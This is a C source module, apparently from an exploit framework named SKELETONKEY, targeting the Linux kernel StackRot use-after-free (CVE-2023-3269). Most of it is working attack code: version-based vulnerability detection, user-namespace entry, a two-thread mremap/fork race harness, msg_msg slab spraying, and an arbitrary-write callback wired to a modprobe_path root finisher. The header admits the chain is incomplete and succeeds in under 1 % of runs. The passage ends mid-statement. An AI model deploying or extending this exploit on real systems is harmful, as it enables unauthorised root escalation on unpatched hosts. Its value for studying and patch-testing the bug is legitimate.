/* * stackrot_cve_2023_3269 — SKELETONKEY module * * "Stack Rot": UAF in maple-tree-based VMA splitting. The maple * tree replaced the rbtree-based VMA store in 6.1; during * __vma_adjust() / split, the kernel could write to a maple node * after it was freed via RCU, leaving anon_vma references dangling * across the grace period. Exploitable for kernel R/W → cred * overwrite. * * Discovered by Ruihan Li (Peking University), Jul 2023. Famous * because it was the first significant exploit landed against the * (then-recently-merged) maple tree code, and because the original * disclosure included a public PoC that worked on default-config * Ubuntu 23.04. The full public PoC is ~1000 lines of maple-tree * state management + RCU-grace-period timing and depends on * per-kernel-build offsets for init_task / anon_vma / cred. * * STATUS: 🟡 OPTION C — race-driver + groom skeleton, with opt-in * --full-chain FALLBACK finisher. We carry the userns-reach, race * harness (mremap()/munmap() vs concurrent fork/fault), msg_msg * slab spray, and empirical witness pieces; we do NOT carry the * read primitive (vmemmap leak via msg_msg MSG_COPY) nor a * Ruihan-Li-precision fake-anon_vma_chain plant. Those need * per-kernel offsets (init_task, anon_vma, cred layout) that vary * by build and would be fabricated without a real leak. * * Per repo policy ("verified-vs-claimed"): we run the trigger, * record empirical signals (slabinfo delta on kmalloc-192, child * signal disposition, race iteration count), and return * SKELETONKEY_EXPLOIT_FAIL with a continuation roadmap. A SIGSEGV/ * SIGBUS/SIGKILL in the race child IS recorded but does NOT get * upgraded to EXPLOIT_OK — only an actual cred swap (euid==0) * does, and we do not currently demonstrate that. 
* * --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race * budget from 3 s to 30 s and sprays the kmalloc-192 slab with * payloads tagged with the modprobe_path kernel address (so IF the * UAF reclaim ever lands attacker-controlled bytes on an * anon_vma_chain slot, those bytes carry the kaddr we want the * subsequent rb_node walk / vma_lock-acquire fault to touch). The * honest empirical reality is that even at 30 s the race-win rate * is well below 1 % on a real vulnerable kernel — Ruihan Li's * public PoC reports minutes-to-hours for first reclaim. The shared * modprobe_path finisher has a 3 s sentinel timeout, so on the * overwhelmingly common no-land outcome the finisher itself reports * EXPLOIT_FAIL gracefully. --full-chain does NOT change the * fundamental ~<1 %-per-run reliability; it widens the trigger * window and wires up the root-pop plumbing for the lucky case. * * Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports: * 6.3.x : K >= 6.3.10 * 6.1.x : K >= 6.1.37 (LTS — most relevant) * mainline 6.4-rc4+ * * Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched. * * Preconditions: * - v.major >= 6 and v.minor in [1, 4] (4 may straddle the fix) * - maple tree in use (CONFIG_MAPLE_TREE; on by default 6.1+) * - /proc/self/maps readable (sanity) * - unprivileged_userns_clone allowed — namespace context improves * groom predictability but the bug is reachable without it * * Coverage rationale: 2023 mm-class bug. Different family than our * netfilter-heavy 2022-2024 modules — broadens the corpus shape. * Affects the 6.1 LTS kernels still widely deployed. 
*/ #include "skeletonkey_modules.h" #include "../../core/registry.h" #include "../../core/kernel_range.h" #include "../../core/offsets.h" #include "../../core/finisher.h" #include "../../core/host.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ # include # include # include # include # include # include #endif /* macOS clangd lacks the Linux mm/syscall headers — guard fallbacks. */ #ifndef CLONE_NEWUSER #define CLONE_NEWUSER 0x10000000 #endif #ifndef MAP_GROWSDOWN #define MAP_GROWSDOWN 0x00100 #endif #ifndef MAP_FIXED_NOREPLACE #define MAP_FIXED_NOREPLACE 0x100000 #endif #ifndef MREMAP_MAYMOVE #define MREMAP_MAYMOVE 1 #endif static const struct kernel_patched_from stackrot_patched_branches[] = { {6, 1, 37}, {6, 3, 10}, {6, 4, 0}, /* mainline */ }; static const struct kernel_range stackrot_range = { .patched_from = stackrot_patched_branches, .n_patched_from = sizeof(stackrot_patched_branches) / sizeof(stackrot_patched_branches[0]), }; /* ---- Detect ------------------------------------------------------- */ /* Sanity check: maple-tree-era kernels expose /proc/self/maps; if it's * not readable here, something exotic is going on (selinux, seccomp, * chroot without /proc) and the bug is not reachable. */ static bool proc_self_maps_readable(void) { int fd = open("/proc/self/maps", O_RDONLY); if (fd < 0) return false; char b[64]; ssize_t r = read(fd, b, sizeof b); close(fd); return r > 0; } /* On 6.1+ the maple tree is the only VMA store — we can't directly * grep for it from userspace, but /proc/self/maps being readable plus * a v.major>=6 / v.minor>=1 release is the proxy we use. */ static bool maple_tree_variant_present(const struct kernel_version *v) { if (v->major > 6) return true; if (v->major == 6 && v->minor >= 1) return true; return false; } static skeletonkey_result_t stackrot_detect(const struct skeletonkey_ctx *ctx) { const struct kernel_version *v = ctx->host ? 
&ctx->host->kernel : NULL; if (!v || v->major == 0) { if (!ctx->json) fprintf(stderr, "[!] stackrot: host fingerprint missing kernel version — bailing\n"); return SKELETONKEY_TEST_ERROR; } /* Bug introduced in 6.1 (when maple tree landed). Pre-6.1 kernels * use rbtree-based VMAs and don't have this bug. */ if (v->major < 6 || (v->major == 6 && v->minor < 1)) { if (!ctx->json) { fprintf(stderr, "[+] stackrot: kernel %s predates maple-tree VMA code (introduced in 6.1)\n", v->release); } return SKELETONKEY_OK; } bool patched = kernel_range_is_patched(&stackrot_range, v); if (patched) { if (!ctx->json) { fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v->release); } return SKELETONKEY_OK; } if (!ctx->json) { fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v->release); fprintf(stderr, "[i] stackrot: mm-class bug — affects default-config kernels; " "no exotic preconditions\n"); } return SKELETONKEY_VULNERABLE; } /* ---- Userns reach ------------------------------------------------- */ #ifdef __linux__ static bool write_file(const char *path, const char *s) { int fd = open(path, O_WRONLY); if (fd < 0) return false; ssize_t n = write(fd, s, strlen(s)); close(fd); return n == (ssize_t)strlen(s); } static bool enter_userns(uid_t outer_uid, gid_t outer_gid) { if (unshare(CLONE_NEWUSER) < 0) return false; /* setgroups=deny is required before writing gid_map without * CAP_SETGID. */ if (!write_file("/proc/self/setgroups", "deny")) return false; char map[64]; snprintf(map, sizeof map, "0 %u 1\n", outer_uid); if (!write_file("/proc/self/uid_map", map)) return false; snprintf(map, sizeof map, "0 %u 1\n", outer_gid); if (!write_file("/proc/self/gid_map", map)) return false; return true; } #endif /* ---- Race-driver state ------------------------------------------- */ /* Page size — fall back to 4 KiB if sysconf is unavailable (won't be on * any kernel we target). 
*/ #define STACKROT_PAGE 4096UL /* How large a region to play with for the MAP_GROWSDOWN segment + * neighbouring VMAs that we mutate with mremap()/munmap(). The * public PoC uses dozens of adjacent VMAs to force the maple tree * into the node-rotation path; we ship a configurable knob. */ #define STACKROT_RACE_VMAS 64 #define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */ #define STACKROT_RACE_TIME_BUDGET 3 /* seconds — primitive-only mode */ #define STACKROT_RACE_FULLCHAIN_BUDGET 30 /* seconds — extended for --full-chain */ /* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on * 6.1.x; targets vary slightly across kernels (anon_vma itself is * kmalloc-192 too on 64-bit with default debug-off configs). */ #define STACKROT_SPRAY_QUEUES 16 #define STACKROT_SPRAY_PER_QUEUE 64 #define STACKROT_SPRAY_PAYLOAD 176 /* 192 - 16 (msg_msg header) */ struct ipc_payload { long mtype; unsigned char buf[STACKROT_SPRAY_PAYLOAD]; }; static _Atomic int g_race_running; static _Atomic uint64_t g_race_a_iters; static _Atomic uint64_t g_race_b_iters; static _Atomic uint64_t g_race_b_faults; #ifdef __linux__ /* Pin to a CPU to encourage Thread A and Thread B to land on * different physical cores (we set complementary masks at thread * start). Best-effort: failure is non-fatal. */ static void pin_to_cpu(int cpu) { cpu_set_t set; CPU_ZERO(&set); CPU_SET(cpu, &set); sched_setaffinity(0, sizeof set, &set); } /* The race victim region: a MAP_GROWSDOWN-mapped page whose * neighbours we'll dance around with mremap()/munmap(). We keep a * couple of anchor pages above and below so the maple tree has to * resolve splits and rotations rather than degenerate to a single * leaf insertion. * * Layout (low to high VA): * [anchor_lo] [growsdown_stack] [filler ... 
] [anchor_hi] * * Thread A repeatedly: * - mmap a scratch page at a chosen address * - mremap it to overlap the boundary that triggers __vma_adjust() * - munmap to free the VMA — this is the codepath whose maple-tree * state is racy on 6.1.0..6.4-rc4. * * Thread B repeatedly: * - fork() a tiny child that touches the growsdown region (fault) + * immediately _exit()s. The fork path walks the parent's VMA * tree and the child's fault path follows anon_vma chains — both * observe maple-tree node state. Concurrent observation of a * freed node is the trigger condition for the UAF. * * On a vulnerable kernel the race window is microseconds wide and * the public PoC reports needing thousands to millions of iterations. */ struct race_region { void *anchor_lo; void *growsdown; void *anchor_hi; size_t growsdown_len; /* Scratch address chosen below the growsdown region so mremap() * can move pages towards the growsdown boundary. */ uintptr_t scratch_va; }; static bool race_region_setup(struct race_region *r) { memset(r, 0, sizeof *r); r->growsdown_len = STACKROT_PAGE * 4; /* Reserve a fixed-address arena far from libc/heap so MAP_FIXED_- * NOREPLACE mmaps don't collide. 0x70000000 region is reliably * free on standard distros; for production work this would be * chosen via /proc/self/maps inspection. */ uintptr_t base = 0x70000000UL; r->anchor_lo = mmap((void *)base, STACKROT_PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE, -1, 0); if (r->anchor_lo == MAP_FAILED) { /* Address might be taken; fall back to letting kernel pick. 
*/ r->anchor_lo = mmap(NULL, STACKROT_PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (r->anchor_lo == MAP_FAILED) return false; base = (uintptr_t)r->anchor_lo + STACKROT_PAGE; } else { base += STACKROT_PAGE; } r->growsdown = mmap((void *)base, r->growsdown_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN, -1, 0); if (r->growsdown == MAP_FAILED) { /* Some kernels reject MAP_GROWSDOWN without a fixed hint; retry. */ r->growsdown = mmap(NULL, r->growsdown_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN, -1, 0); if (r->growsdown == MAP_FAILED) return false; base = (uintptr_t)r->growsdown + r->growsdown_len; } else { base += r->growsdown_len; } r->anchor_hi = mmap((void *)base, STACKROT_PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (r->anchor_hi == MAP_FAILED) return false; /* Touch each region so the kernel actually populates the * anon_vma chain (anon_vma is allocated lazily on first fault). */ ((volatile char *)r->anchor_lo)[0] = 1; ((volatile char *)r->growsdown)[r->growsdown_len - 1] = 1; ((volatile char *)r->anchor_hi)[0] = 1; r->scratch_va = (uintptr_t)r->growsdown - STACKROT_PAGE; return true; } static void race_region_teardown(struct race_region *r) { if (r->anchor_lo && r->anchor_lo != MAP_FAILED) munmap(r->anchor_lo, STACKROT_PAGE); if (r->growsdown && r->growsdown != MAP_FAILED) munmap(r->growsdown, r->growsdown_len); if (r->anchor_hi && r->anchor_hi != MAP_FAILED) munmap(r->anchor_hi, STACKROT_PAGE); } /* Thread A: trigger the maple-tree node-rotation path by repeatedly * mapping, mremap-extending toward the growsdown boundary, and * munmapping. The exact ordering (the node-rotation must happen * while a parallel reader is in the RCU read-side critical section) * is what makes this race hard. 
*/
/* pthread entry point. `arg` is the struct race_region shared with
 * Thread B; only its scratch_va field is read here. Loops until
 * g_race_running reads as zero, bumping g_race_a_iters once per completed
 * map/remap/unmap cycle. Always returns NULL. */
static void *race_thread_a(void *arg)
{
    struct race_region *r = (struct race_region *)arg;
    pin_to_cpu(0);

    while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
        /* mmap a scratch page just below the growsdown region.
         * scratch_va is passed as a hint only (no MAP_FIXED), so the
         * kernel may place the page elsewhere. */
        void *scratch = mmap((void *)r->scratch_va, STACKROT_PAGE,
                             PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (scratch == MAP_FAILED) {
            /* Not counted as an iteration; give up the CPU and retry. */
            sched_yield();
            continue;
        }
        /* Write once so the page is faulted in before it is remapped. */
        ((volatile char *)scratch)[0] = 2;

        /* mremap to a new VA (forces VMA split + maple-tree mutation). */
        void *moved = mremap(scratch, STACKROT_PAGE, STACKROT_PAGE * 2,
                             MREMAP_MAYMOVE);
        if (moved != MAP_FAILED) {
            ((volatile char *)moved)[0] = 3;
            munmap(moved, STACKROT_PAGE * 2);
        } else {
            /* Resize failed: the original one-page mapping is still
             * there and must be released at its original size. */
            munmap(scratch, STACKROT_PAGE);
        }

        atomic_fetch_add_explicit(&g_race_a_iters, 1, memory_order_relaxed);
        sched_yield();
    }
    return NULL;
}

/* Thread B: spawn a short-lived child that faults the growsdown
 * region, then _exit. fork() copies the parent's VMA tree (touches
 * every maple-tree node and anon_vma chain) — racing against
 * Thread A's munmap, the child can observe a freed node. The page
 * fault inside the child closes the loop: the bug manifests as a
 * read of stale anon_vma->root or anon_vma_chain->same_vma.
 *
 * pthread entry point; `arg` is the shared struct race_region. Loops
 * until g_race_running reads as zero. g_race_b_iters counts children that
 * were forked and waited for; g_race_b_faults counts those that
 * terminated on a signal. Always returns NULL. */
static void *race_thread_b(void *arg)
{
    struct race_region *r = (struct race_region *)arg;
    pin_to_cpu(1);

    while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
        pid_t pid = fork();
        if (pid == 0) {
            /* Child: brief, deterministic fault sequence — read one byte
             * from each page of the growsdown region, then leave without
             * running any atexit handlers. */
            volatile char *p = (volatile char *)r->growsdown;
            char sink = 0;
            for (size_t off = 0; off < r->growsdown_len; off += STACKROT_PAGE) {
                sink ^= p[off];
            }
            (void)sink;
            _exit(0);
        }
        if (pid > 0) {
            int status = 0;
            /* The waitpid() result is not checked; if it fails, status
             * stays 0 and the iteration is still counted. */
            waitpid(pid, &status, 0);
            if (WIFSIGNALED(status)) {
                /* Child died on a fault — interesting signal for
                 * empirical witness. The race-driver caller polls
                 * this counter. */
                atomic_fetch_add_explicit(&g_race_b_faults, 1,
                                          memory_order_relaxed);
            }
            atomic_fetch_add_explicit(&g_race_b_iters, 1, memory_order_relaxed);
        }
        /* A failed fork() (pid < 0) falls through to here and is retried
         * on the next pass without being counted. */
        sched_yield();
    }
    return NULL;
}

/* ---- Groom skeleton ---------------------------------------------- */

/* msg_msg sysv spray for kmalloc-192. Tagged with "SKELETONKEY_" cookie
 * so a forensic look at /proc/slabinfo / KASAN dumps shows our
 * fingerprint.
 *
 * Creates up to STACKROT_SPRAY_QUEUES private queues and sends up to
 * STACKROT_SPRAY_PER_QUEUE identical messages to each, stopping early on a
 * queue at the first msgsnd() failure. queues[i] receives the queue id, or
 * -1 when msgget() failed for that slot. Returns the number of queues
 * created. */
static int spray_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
{
    struct ipc_payload p;
    memset(&p, 0, sizeof p);
    p.mtype = 0x4943; /* 'IC' */
    memset(p.buf, 0x49, sizeof p.buf);
    /* Only the first 8 bytes of the cookie ("SKELETON") are copied; the
     * rest of the body keeps the 0x49 fill. */
    memcpy(p.buf, "SKELETONKEY_", 8);

    int created = 0;
    for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        if (q < 0) {
            queues[i] = -1;
            continue;
        }
        queues[i] = q;
        created++;
        for (int j = 0; j < STACKROT_SPRAY_PER_QUEUE; j++) {
            /* IPC_NOWAIT: a full queue fails immediately instead of
             * blocking; move on to the next queue. */
            if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0)
                break;
        }
    }
    return created;
}

/* Remove every queue recorded in `queues` (entries < 0 are skipped).
 * The ids in the array are left unchanged. */
static void drain_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
{
    for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
        if (queues[i] >= 0)
            msgctl(queues[i], IPC_RMID, NULL);
    }
}

/* Read /proc/slabinfo for kmalloc-192 active count. Used as the
 * primary empirical witness: a successful UAF + refill perturbs
 * this counter in a way that's distinguishable from idle drift.
 *
 * Returns the first numeric column of the "kmalloc-192" line, or -1 when
 * the file cannot be opened, the line is absent, or it does not parse. */
static long slab_active_kmalloc_192(void)
{
    FILE *f = fopen("/proc/slabinfo", "r");
    if (!f)
        return -1;

    char line[512];
    long active = -1;
    while (fgets(line, sizeof line, f)) {
        /* The trailing space in the prefix keeps longer cache names that
         * merely start with "kmalloc-192" from matching. */
        if (strncmp(line, "kmalloc-192 ", 12) == 0) {
            char name[64];
            long act = 0, num = 0;
            /* Accept the line as soon as the name and the first number
             * parse; the second number is read but not used. */
            if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
                active = act;
            }
            break;
        }
    }
    fclose(f);
    return active;
}

/* ---- Arb-write primitive (FALLBACK depth) ------------------------
 *
 * The shared modprobe_path finisher calls back into this function
 * once per kernel write it wants to land.
For StackRot we cannot * deliver a deterministic arb-write — the underlying race wins on * well under 1 % of runs even with a 30 s budget, and even when the * race wins our spray-only groom has nowhere near the precision of * Ruihan Li's multi-stage public PoC (which crafts a fake * anon_vma_chain whose `vma_lock` pointer steers a subsequent * page-fault into touching `kaddr` for the lock acquire). * * Honest depth: FALLBACK. Each invocation: * 1. Re-seeds the kmalloc-192 spray with payloads tagged with * `kaddr` packed into the first qword of the msg_msg body — * so IF a sprayed slot ends up overlaying the freed * anon_vma_chain after RCU grace, the kaddr we want the * kernel to deref appears at the AVC layout position the * maple-tree rotation will read. * 2. Re-runs the race threads for an extended budget * (STACKROT_RACE_FULLCHAIN_BUDGET seconds). * 3. Returns 0 unconditionally — we cannot in-process verify * whether the write landed. The shared finisher's 3 s sentinel * file check is the empirical arbiter: on the overwhelmingly * common no-land outcome it reports EXPLOIT_FAIL gracefully, * and we never claim a write that didn't land. */ struct stackrot_arb_ctx { int *queues; /* live SysV msg queue ids */ int n_queues; int arb_calls; /* incremented by stackrot_arb_write() */ struct race_region *region; }; static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES], uintptr_t kaddr, const void *buf, size_t len) { struct ipc_payload p; memset(&p, 0, sizeof p); p.mtype = 0x4943; /* 'IC' */ memset(p.buf, 0x49, sizeof p.buf); memcpy(p.buf, "SKELETONKEY_", 8); /* Pack the target kaddr at byte 8 (one qword in) and the * caller's payload bytes immediately after — this way ANY * reasonable AVC field offset hit by the corruption pulls * out one of our two attacker-controlled regions. 
*/ uint64_t k64 = (uint64_t)kaddr; memcpy(p.buf + 8, &k64, sizeof k64); size_t copy = len; if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16; if (buf && copy) memcpy(p.buf + 16, buf, copy); /* Replace contents in a couple of queues; doing all 16 would * blow the per-process msgq quota on busy hosts. */ int touched = 0; for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) { if (queues[i] < 0) continue; if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++; } return touched; } static int stackrot_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *ctx_v) { struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v; if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1; c->arb_calls++; fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu " "(FALLBACK — race-dependent)\n", c->arb_calls, (unsigned long)kaddr, len); /* Step 1: re-seed spray with kaddr-tagged payloads. */ int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len); if (seeded == 0) { fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n"); /* Continue anyway — original spray still tagged with cookie. */ } else { fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n", seeded); } /* Step 2: extended race window. Honestly: this expands the * trigger budget from 3 s to 30 s, but Ruihan Li's PoC reports * minutes-to-hours for first reclaim — so 30 s ≈ <1 % per * arb_write call on a real vulnerable kernel, and structurally * 0 % on a patched one. 
*/ atomic_store(&g_race_running, 1); atomic_store(&g_race_a_iters, 0); atomic_store(&g_race_b_iters, 0); atomic_store(&g_race_b_faults, 0); pthread_t ta, tb; bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0; bool b_ok = a_ok && pthread_create(&tb, NULL, race_thread_b, c->region) == 0; if (!a_ok || !b_ok) { atomic_store(&g_race_running, 0); if (a_ok) pthread_join(ta, NULL); fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n"); return -1; } sleep(STACKROT_RACE_FULLCHAIN_BUDGET); atomic_store(&g_race_running, 0); pthread_join(ta, NULL); pthread_join(tb, NULL); uint64_t a_iters = atomic_load(&g_race_a_iters); uint64_t b_iters = atomic_load(&g_race_b_iters); uint64_t b_faults = atomic_load(&g_race_b_faults); fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu " "(reliability remains <1%% even at this budget)\n", (unsigned long long)a_iters, (unsigned long long)b_iters, (unsigned long long)b_faults); /* Step 3: cannot in-process verify the write. Return 0; the * finisher's sentinel-file check is the empirical arbiter. */ return 0; } #endif /* __linux__ */ /* ---- Exploit driver ---------------------------------------------- */ #ifdef __linux__ static skeletonkey_result_t stackrot_exploit_linux(const struct skeletonkey_ctx *ctx) { /* 1. Refuse-gate: re-call detect() and short-circuit. */ skeletonkey_result_t pre = stackrot_detect(ctx); if (pre == SKELETONKEY_OK) { fprintf(stderr, "[+] stackrot: kernel not vulnerable; refusing exploit\n"); return SKELETONKEY_OK; } if (pre != SKELETONKEY_VULNERABLE) { fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n"); return pre; } bool is_root = ctx->host ? 
ctx->host->is_root : (geteuid() == 0); if (is_root) { fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n"); return SKELETONKEY_OK; } if (!proc_self_maps_readable()) { fprintf(stderr, "[-] stackrot: /proc/self/maps not readable — exotic env, " "cannot drive the race\n"); return SKELETONKEY_PRECOND_FAIL; } { const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL; if (!v || v->major == 0 || !maple_tree_variant_present(v)) { fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n"); return SKELETONKEY_PRECOND_FAIL; } } /* Full-chain pre-check: resolve offsets BEFORE forking + entering * userns. If modprobe_path is unresolvable we refuse here rather * than running a 30 s race that has no finisher to call. */ struct skeletonkey_kernel_offsets off; bool full_chain_ready = false; if (ctx->full_chain) { memset(&off, 0, sizeof off); skeletonkey_offsets_resolve(&off); if (!skeletonkey_offsets_have_modprobe_path(&off)) { skeletonkey_finisher_print_offset_help("stackrot"); fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path " "offset unresolved; refusing\n"); fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is " "well below 1%% per run — see module header.\n"); return SKELETONKEY_EXPLOIT_FAIL; } skeletonkey_offsets_print(&off); full_chain_ready = true; fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to " "%d s, but RELIABILITY REMAINS <1%% per run on a real\n" " vulnerable kernel. The finisher's 3 s sentinel timeout\n" " catches no-land outcomes gracefully.\n", STACKROT_RACE_FULLCHAIN_BUDGET); } if (!ctx->json) { fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n", ctx->full_chain ? " + full-chain finisher" : ""); } uid_t outer_uid = getuid(); gid_t outer_gid = getgid(); signal(SIGPIPE, SIG_IGN); pid_t child = fork(); if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; } if (child == 0) { /* 2. Userns reach. 
Bug is reachable without it, but userns * + uid_map=0 makes the groom more predictable (fewer * competing kmalloc-192 allocations from the parent * namespace's tooling). */ if (!enter_userns(outer_uid, outer_gid)) { fprintf(stderr, "[~] stackrot: enter_userns failed — continuing without " "namespace isolation (bug is still reachable)\n"); } /* 3. Race region. */ struct race_region region; if (!race_region_setup(®ion)) { fprintf(stderr, "[-] stackrot: race_region_setup failed: %s\n", strerror(errno)); _exit(22); } /* 4. Groom: pre-populate kmalloc-192 with msg_msg payloads * BEFORE the race so the freed slot gets recycled with * attacker-controlled bytes when the bug fires. */ int queues[STACKROT_SPRAY_QUEUES] = {0}; int n_queues = spray_anon_vma_slab(queues); if (n_queues == 0) { fprintf(stderr, "[-] stackrot: msg_msg spray produced 0 queues\n"); race_region_teardown(®ion); _exit(23); } if (!ctx->json) { fprintf(stderr, "[*] stackrot: kmalloc-192 spray seeded %d queues x %d msgs\n", n_queues, STACKROT_SPRAY_PER_QUEUE); } long slab_pre = slab_active_kmalloc_192(); /* 5. Run the race for a bounded time budget. */ atomic_store(&g_race_running, 1); atomic_store(&g_race_a_iters, 0); atomic_store(&g_race_b_iters, 0); atomic_store(&g_race_b_faults, 0); pthread_t ta, tb; if (pthread_create(&ta, NULL, race_thread_a, ®ion) != 0 || pthread_create(&tb, NULL, race_thread_b, ®ion) != 0) { fprintf(stderr, "[-] stackrot: pthread_create failed\n"); atomic_store(&g_race_running, 0); drain_anon_vma_slab(queues); race_region_teardown(®ion); _exit(24); } sleep(STACKROT_RACE_TIME_BUDGET); atomic_store(&g_race_running, 0); pthread_join(ta, NULL); pthread_join(tb, NULL); long slab_post = slab_active_kmalloc_192(); uint64_t a_iters = atomic_load(&g_race_a_iters); uint64_t b_iters = atomic_load(&g_race_b_iters); uint64_t b_faults = atomic_load(&g_race_b_faults); /* 6. Empirical witness breadcrumb. 
*/ FILE *log = fopen("/tmp/skeletonkey-stackrot.log", "w"); if (log) { fprintf(log, "stackrot race harness:\n" " thread_a_iters = %llu (mremap/munmap)\n" " thread_b_iters = %llu (fork+fault)\n" " thread_b_faults = %llu (child died on signal)\n" " slab_kmalloc192_pre = %ld\n" " slab_kmalloc192_post = %ld\n" " slab_delta = %ld\n" " spray_queues = %d\n" " spray_per_queue = %d\n" " growsdown_len = %zu\n" "Note: this run did NOT attempt cred overwrite (no leak\n" "primitive; per-kernel offsets unknown). See module .c\n" "for the continuation roadmap.\n", (unsigned long long)a_iters, (unsigned long long)b_iters, (unsigned long long)b_faults, slab_pre, slab_post, (slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0, n_queues, STACKROT_SPRAY_PER_QUEUE, (size_t)region.growsdown_len); fclose(log); } if (!ctx->json) { fprintf(stderr, "[*] stackrot: race ran for %ds — A=%llu B=%llu B_faults=%llu\n", STACKROT_RACE_TIME_BUDGET, (unsigned long long)a_iters, (unsigned long long)b_iters, (unsigned long long)b_faults); fprintf(stderr, "[*] stackrot: kmalloc-192 active: pre=%ld post=%ld\n", slab_pre, slab_post); } /* Hold the spray so the kernel observes refilled slots during * any in-flight RCU grace periods that started during the race. */ usleep(200 * 1000); /* 7a. --full-chain finisher (FALLBACK depth). * * Invoke the shared modprobe_path finisher; its arb_write * callback (stackrot_arb_write) will re-seed the spray with * kaddr-tagged payloads and re-run the race for an extended * 30 s budget. The finisher's own 3 s sentinel-file timeout * then arbitrates: on the overwhelmingly common no-land * outcome it returns EXPLOIT_FAIL gracefully. * * Honest reliability: <1 % per run even with the extension. 
*/ if (full_chain_ready) { struct stackrot_arb_ctx arb_ctx = { .queues = queues, .n_queues = STACKROT_SPRAY_QUEUES, .arb_calls = 0, .region = ®ion, }; int fr = skeletonkey_finisher_modprobe_path(&off, stackrot_arb_write, &arb_ctx, !ctx->no_shell); FILE *fl = fopen("/tmp/skeletonkey-stackrot.log", "a"); if (fl) { fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n", fr, arb_ctx.arb_calls); fclose(fl); } drain_anon_vma_slab(queues); race_region_teardown(®ion); if (fr == SKELETONKEY_EXPLOIT_OK) _exit(34); /* root popped */ _exit(35); /* finisher ran, no land */ } drain_anon_vma_slab(queues); race_region_teardown(®ion); /* 7. Continuation roadmap — what would land EXPLOIT_OK. * * TODO(leak): replace one of the spray queues with a * msgrcv(..., MSG_COPY|IPC_NOWAIT) probe and scan the * returned buffer for non-cookie bytes. The bug's UAF * write leaves a kernel pointer (anon_vma->root or the * mas->node parent) at a known offset inside the freed * slab slot. Recover {kbase, init_task} via that leak. * * TODO(write): with kbase known, repeat the trigger but * plant a fake anon_vma_chain whose `rb_node` parent * pointer points at ¤t->cred — the maple-tree * rotation writes a controlled value into that location. * Crafting the fake AVC requires offset of anon_vma_chain * fields per kernel build (CONFIG_DEBUG_LIST/KFENCE/etc. * perturb the layout — must NOT be hardcoded). * * TODO(overwrite): land &init_cred over current->cred so * the next call to a permission check sees uid==0. * * None of these are implemented today. We exit 30 to * flag "trigger ran cleanly, no escalation". */ _exit(30); } /* PARENT */ int status = 0; pid_t w = waitpid(child, &status, 0); if (w < 0) { perror("waitpid"); return SKELETONKEY_TEST_ERROR; } if (WIFSIGNALED(status)) { int sig = WTERMSIG(status); if (!ctx->json) { fprintf(stderr, "[!] 
